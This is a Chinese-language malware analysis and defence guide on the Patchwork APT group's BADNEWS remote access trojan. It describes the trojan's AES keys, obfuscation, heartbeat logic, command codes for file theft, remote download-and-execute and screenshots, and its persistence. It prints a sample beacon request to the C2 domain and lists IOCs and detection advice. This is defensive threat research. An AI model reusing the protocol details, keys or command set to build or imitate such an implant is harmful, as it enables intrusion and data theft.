APT组织Patchwork七月活动,Widnows主战远控武器BADNEWS再升级
字数 2420 2025-08-24 07:48:22

APT组织Patchwork的BADNEWS远控木马分析与防御指南

一、背景概述

APT组织Patchwork(又称Dropping Elephant)近期针对国内实体发起攻击活动,使用其主战远控武器BADNEWS。该木马自2021年以来经历了多次迭代升级,最新版本(2024年7月)在通信协议、加解密算法、指令功能、免杀混淆等方面均有显著改进。

二、样本技术分析

2.1 基本信息

  • 样本体积
    • 初始载荷:692KB
    • BADNEWS本体:280KB(较历史版本精简)
  • 释放过程:包含2次shellcode释放
  • 功能模块变化
    • 删除:键盘记录功能(指令码3fgbfnjb3)
    • 新增:
      • 心跳单包立即发送(指令码3gnfm9)
      • cmd命令执行直接回传结果(指令码frgt45f)

2.2 加解密与混淆技术

2.2.1 加密算法

  • 主要算法
    • AES-CBC-128
    • XOR
    • BASE64
  • 哈希计算:利用异或、循环右移等方式校验shellcode和字符
  • 密钥存储:从shellcode段中定位获取(非硬编码)
    • AES_KEY: 3732386B7042764C74396E636A70356C
    • AES_IV: 394C3878643347356F624C527558666B

2.2.2 混淆技术

  • API调用:全部使用函数指针形式调用
  • 字符串处理
    • 对WIN API、HTTP协议字段等关键字符进行混淆
    • 敏感字符使用后立即释放内存
  • 示例对比(cmd命令执行功能):
    • 历史版本:直接调用cmd.exe
    • 新版本:通过复杂混淆方式隐藏特征

2.3 通信模块

2.3.1 通信架构变化

  • 历史版本:使用三个线程与C2通信
  • 新版本:仅保留心跳线程,主功能模块置于主函数中

2.3.2 心跳机制

  • 历史版本

    • 基于TLS种子生成伪随机数
    • 取模决定心跳间隔(1-33.767秒)

  • 新版本改进

    • 根据服务端状态进行逻辑判断
    • 产生更多类型的心跳睡眠周期
    • 显著增加流量检测难度

2.3.3 数据包格式

上线数据包加密流程

原始数据 → BASE64 → AES加密 → BASE64 → 格式化 → TLS加密传输

示例数据包

POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
host: telsiairegion.xyz

uedf=Nudc74ukcfLaqw96hZcM05AFx4faIX8GFHLa9FZ9SBldmtuciInnwX0P1mKRIwcwZnCo5k449uWfVMry6m6Ttg==#**#dSHXPP0JYsd3jE+uURPmWw==#**#mAfqN+zWHKNNdklI7Z64ykuRlRGg1S2uurrJ1zjcAZw=#**#y/gR47XQJCL4lD+PCUJKGQ==#**#e4e9oaydCVdHL96FqHLphQ==#**#dSHXPP0JYsd3jE+uURPmWw==

2.4 功能模块

2.4.1 信息收集

收集以下系统信息并加密回传:

  • UUID(通过GetSystemFirmwareTable获取SMBIOS UUID)
  • 用户名
  • 操作系统版本(注意:Win10可能被误判为Win8)
  • 本地IP地址(通过GetAdaptersInfo获取)
  • 出口IP地址(通过多个外部API获取)
  • 所属国家名称

IP获取途径

  1. hxxps://myexternalip.com/raw
  2. hxxps://api.ipify.org?format=csv
  3. hxxps://ifconfig.me/ip

国家信息获取

  • https://api.iplocation.net/?cmd=ip-country&ip=

2.4.2 指令集

指令码 功能描述
3hdfghd1 指定文件读取,回传文件
3gjdfghj6 cmd命令执行,写入文件后回传
3gnfm9 心跳包单包发送
3fgjfhg4 指定路径文件遍历,回传信息
3gnfjhk7 指定远程文件下载并执行,回传状态
3ngjfng5 指定远程文件下载,回传状态
3fghnbj2 屏幕截图,回传图像
frgt45f cmd命令执行,直接回传结果

指令处理流程

  1. 发送包含UUID的请求包
  2. 接收C2响应(格式:指令$参数1$参数2
  3. 通过if-else逻辑执行对应指令

2.5 反检测技术

  • 反调试
    • 去除符号信息
    • 敏感操作后立即清理内存痕迹
  • 持久化
    • 创建计划任务实现周期性执行
    • 互斥锁防止重复执行(对象名:"RfmbFv8D")
  • 窗口隐藏:隐藏控制台窗口

三、防御建议

3.1 检测指标

IOC

  • 域名:telsiairegion.xyz
  • URL路径:/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php
  • 样本哈希:C58A7C4BAFFA401C71A1A333ECD0F956

网络检测

  • 监控对非常规IP查询API的访问
  • 检测异常TLS连接(特别是与上述IOC相关的)
  • 关注不规则心跳模式的HTTP POST请求

主机检测

  • 查找互斥锁"RfmbFv8D"
  • 监控异常的计划任务创建
  • 检测使用复杂混淆技术的进程内存特征

3.2 防护措施

  1. 终端防护

    • 部署具有行为检测能力的EDR解决方案
    • 限制cmd.exe等系统工具的非正常调用

  2. 网络防护

    • 阻断与已知恶意域名的通信
    • 实施TLS流量解密检查(合规前提下)
    • 监控异常外联流量模式

  3. 安全意识

    • 加强钓鱼邮件识别培训
    • 避免点击不明附件或链接

  4. 系统加固

    • 定期更新系统和应用补丁
    • 限制不必要的API调用权限
    • 启用内存保护机制

四、分析技巧

  1. 关键点定位

    • 关注内存释放操作,可能包含重要线索
    • 跟踪shellcode段中的密钥信息

  2. 动态分析

    • 使用沙箱环境观察行为特征
    • 重点监控网络通信和进程创建

  3. 静态分析

    • 注意函数指针调用模式
    • 识别混淆后的字符串和API调用

  4. 流量分析

    • 解密后关注BASE64+AES的双重加密结构
    • 分析心跳包的不规则时间间隔

通过全面了解BADNEWS木马的技术特点和演变趋势,安全团队可以更有针对性地构建防御体系,有效应对Patchwork组织的攻击活动。

APT组织Patchwork的BADNEWS远控木马分析与防御指南 一、背景概述 APT组织Patchwork(又称Dropping Elephant)近期针对国内实体发起攻击活动,使用其主战远控武器BADNEWS。该木马自2021年以来经历了多次迭代升级,最新版本(2024年7月)在通信协议、加解密算法、指令功能、免杀混淆等方面均有显著改进。 二、样本技术分析 2.1 基本信息 样本体积 : 初始载荷:692KB BADNEWS本体:280KB(较历史版本精简) 释放过程 :包含2次shellcode释放 功能模块变化 : 删除:键盘记录功能(指令码3fgbfnjb3) 新增: 心跳单包立即发送(指令码3gnfm9) cmd命令执行直接回传结果(指令码frgt45f) 2.2 加解密与混淆技术 2.2.1 加密算法 主要算法 : AES-CBC-128 XOR BASE64 哈希计算 :利用异或、循环右移等方式校验shellcode和字符 密钥存储 :从shellcode段中定位获取(非硬编码) AES_ KEY: 3732386B7042764C74396E636A70356C AES_ IV: 394C3878643347356F624C527558666B 2.2.2 混淆技术 API调用 :全部使用函数指针形式调用 字符串处理 : 对WIN API、HTTP协议字段等关键字符进行混淆 敏感字符使用后立即释放内存 示例对比 (cmd命令执行功能): 历史版本:直接调用 cmd.exe 新版本:通过复杂混淆方式隐藏特征 2.3 通信模块 2.3.1 通信架构变化 历史版本:使用三个线程与C2通信 新版本:仅保留心跳线程,主功能模块置于主函数中 2.3.2 心跳机制 历史版本 : 基于TLS种子生成伪随机数 取模决定心跳间隔(1-33.767秒) 新版本改进 : 根据服务端状态进行逻辑判断 产生更多类型的心跳睡眠周期 显著增加流量检测难度 2.3.3 数据包格式 上线数据包加密流程 : 示例数据包 : 2.4 功能模块 2.4.1 信息收集 收集以下系统信息并加密回传: UUID(通过 GetSystemFirmwareTable 获取SMBIOS UUID) 用户名 操作系统版本(注意:Win10可能被误判为Win8) 本地IP地址(通过 GetAdaptersInfo 获取) 出口IP地址(通过多个外部API获取) 所属国家名称 IP获取途径 : hxxps://myexternalip.com/raw hxxps://api.ipify.org?format=csv hxxps://ifconfig.me/ip 国家信息获取 : https://api.iplocation.net/?cmd=ip-country&ip= 2.4.2 指令集 | 指令码 | 功能描述 | |----------|----------------------------------| | 3hdfghd1 | 指定文件读取,回传文件 | | 3gjdfghj6| cmd命令执行,写入文件后回传 | | 3gnfm9 | 心跳包单包发送 | | 3fgjfhg4 | 指定路径文件遍历,回传信息 | | 3gnfjhk7 | 指定远程文件下载并执行,回传状态 | | 3ngjfng5 | 指定远程文件下载,回传状态 | | 3fghnbj2 | 屏幕截图,回传图像 | | frgt45f | cmd命令执行,直接回传结果 | 指令处理流程 : 发送包含UUID的请求包 接收C2响应(格式: 指令$参数1$参数2 ) 通过if-else逻辑执行对应指令 2.5 反检测技术 反调试 : 去除符号信息 敏感操作后立即清理内存痕迹 持久化 : 创建计划任务实现周期性执行 互斥锁防止重复执行(对象名:"RfmbFv8D") 窗口隐藏 :隐藏控制台窗口 三、防御建议 3.1 检测指标 IOC : 域名: telsiairegion.xyz URL路径: /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php 样本哈希: C58A7C4BAFFA401C71A1A333ECD0F956 网络检测 : 监控对非常规IP查询API的访问 检测异常TLS连接(特别是与上述IOC相关的) 关注不规则心跳模式的HTTP POST请求 主机检测 : 查找互斥锁"RfmbFv8D" 监控异常的计划任务创建 检测使用复杂混淆技术的进程内存特征 3.2 防护措施 终端防护 : 部署具有行为检测能力的EDR解决方案 限制cmd.exe等系统工具的非正常调用 网络防护 : 阻断与已知恶意域名的通信 实施TLS流量解密检查(合规前提下) 监控异常外联流量模式 安全意识 : 加强钓鱼邮件识别培训 避免点击不明附件或链接 系统加固 : 定期更新系统和应用补丁 限制不必要的API调用权限 启用内存保护机制 四、分析技巧 关键点定位 : 关注内存释放操作,可能包含重要线索 跟踪shellcode段中的密钥信息 动态分析 : 使用沙箱环境观察行为特征 重点监控网络通信和进程创建 静态分析 : 注意函数指针调用模式 识别混淆后的字符串和API调用 流量分析 : 解密后关注BASE64+AES的双重加密结构 分析心跳包的不规则时间间隔 通过全面了解BADNEWS木马的技术特点和演变趋势,安全团队可以更有针对性地构建防御体系,有效应对Patchwork组织的攻击活动。